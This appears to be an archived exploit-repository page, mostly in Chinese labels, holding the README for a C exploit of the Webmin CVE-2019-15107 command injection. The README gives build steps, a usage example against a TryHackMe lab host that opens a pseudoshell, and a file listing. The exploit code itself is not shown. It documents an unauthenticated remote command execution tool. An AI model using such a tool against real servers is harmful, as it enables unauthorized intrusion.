来源

关联漏洞

描述

CVE-2019-15107 Webmin Exploit in C

介绍

<h1 align="center">CVE-2019-15107 Webmin Exploit</h1>
<p align="center">
<a href="./LICENSE.md"><img src="https://img.shields.io/badge/License-GPL%20v2-blue.svg"></a>
<img src="https://img.shields.io/badge/Made%20With-C-green.svg"></a>

<h2>CVE-2019-15107</h2>
<p>An issue was discovered in <b>Webmin <=1.920</b>. The parameter <code>old</code> in <code>password_change.cgi</code> contains a command injection vulnerability. <a href="https://nvd.nist.gov/vuln/detail/cve-2019-15107" target="_blank"> [NVD]</a></p>

## Compiling
```bash
$ git clone https://github.com/whokilleddb/CVE-2019-15107
$ cd CVE-2019-15107
$ make
```

## Example Usage
```bash
$ ./exploit http://thomaswreath.thm:10000
[+] CVE-2019-15107 Webmin Unauhenticated Remote Command Execution
[+] Target URI: http://thomaswreath.thm:10000

======Headers======
HTTP/1.0 200 Document follows
Server: MiniServ/1.890
Date: Sat, 14 Aug 2021 23:40:01 GMT
Content-type: text/html; Charset=iso-8859-1
Connection: close

[~] The Given Server Is Running In SSL MODE
[+] Switching To SSL
[+] The Given Server Might Be Vulnerable To CVE-2019-15107
[+] The Given Server IS VULNERABLE To CVE-2019-15107
[+] Starting Pseudoshell
[+] Maximum Command Length(CMD_SIZE) Is Set To: 2048
[+] To Exit, type: exit()

```
_PS: This exploit was made while I was trying [TryHackMe's Wreath Network](https://tryhackme.com/room/wreath), hence the example show here corresponds to the box._

## F.A.Q
Q : **Why C instead of Python3?**

A : **Because I Am A Psychopath**

文件快照

 [4.0K]  /data/pocs/95de1a1acba7911aa793b7e599016b9fb0601be0
├── [ 18K]  LICENSE.GPL2
├── [ 463]  Makefile
├── [1.5K]  README.md
└── [4.0K]  src
    ├── [4.0K]  globals
    │   ├── [ 351]  structs.h
    │   └── [ 238]  variables.h
    ├── [4.0K]  headers
    │   ├── [4.9K]  CURL.h
    │   └── [3.0K]  modules.h
    └── [4.0K]  main
        └── [1.9K]  main.c

4 directories, 8 files

备注